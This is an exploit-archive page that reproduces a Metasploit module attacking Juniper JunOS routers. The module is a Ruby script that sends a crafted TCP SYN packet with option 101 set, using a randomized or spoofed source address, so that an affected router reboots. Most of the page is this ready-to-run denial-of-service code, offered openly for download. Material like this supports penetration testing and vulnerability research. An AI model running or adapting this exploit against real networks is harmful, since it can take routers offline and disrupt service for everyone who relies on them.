what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Juniper JunOS Malformed TCP Option

Juniper JunOS Malformed TCP Option
Posted Aug 31, 2024
Authored by Tod Beardsley | Site metasploit.com

This Metasploit module exploits a denial of service vulnerability in Juniper Networks JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.

tags | exploit, denial of service, tcp
systems | juniper
SHA-256 | 08cdfbd242df275e59eddfc4bc6b02c08584e7f50c6f6577a3ecd7ea5c272711

Juniper JunOS Malformed TCP Option

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos

def initialize
super(
'Name' => 'Juniper JunOS Malformed TCP Option',
'Description' => %q{ This module exploits a denial of service vulnerability
in Juniper Network's JunOS router operating system. By sending a TCP
packet with TCP option 101 set, an attacker can cause an affected
router to reboot.
},
'Author' => 'todb',
'License' => MSF_LICENSE,
'References' =>
[
['BID', '37670'],
['OSVDB', '61538'],
['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
]
)

register_options([
OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
])

deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
end

def rport
datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i
end

def sport
datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i
end

def shost
datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
end

def run

open_pcap

p = PacketFu::TCPPacket.new
p.ip_daddr = rhost
p.ip_saddr = shost
p.ip_ttl = rand(128) + 128
p.tcp_sport = sport
p.tcp_dport = rport
p.tcp_flags.syn = 1
p.tcp_win = rand(4096)+1
p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol
p.recalc
print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")
capture_sendto(p,rhost)
close_pcap
end
end
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close